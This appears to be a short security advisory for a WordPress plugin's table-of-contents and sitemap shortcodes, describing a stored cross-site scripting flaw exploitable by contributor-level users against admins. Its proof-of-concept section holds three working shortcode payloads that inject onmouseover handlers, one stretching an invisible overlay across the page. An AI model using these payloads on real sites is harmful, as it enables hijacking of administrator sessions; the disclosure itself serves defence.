The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.

PoC

[toc heading_levels=‘1’ class=‘" onmouseover="alert(/XSS/)’]

XSS

content

XSS

content

XSS

content

XSS

content Note: it is only generated by the shortcode if there is content for the TOC, so it must be used together, and it needs at least 4 header tags to work. [sitemap_pages heading=‘1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//’] [sitemap_categories heading=‘1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//’]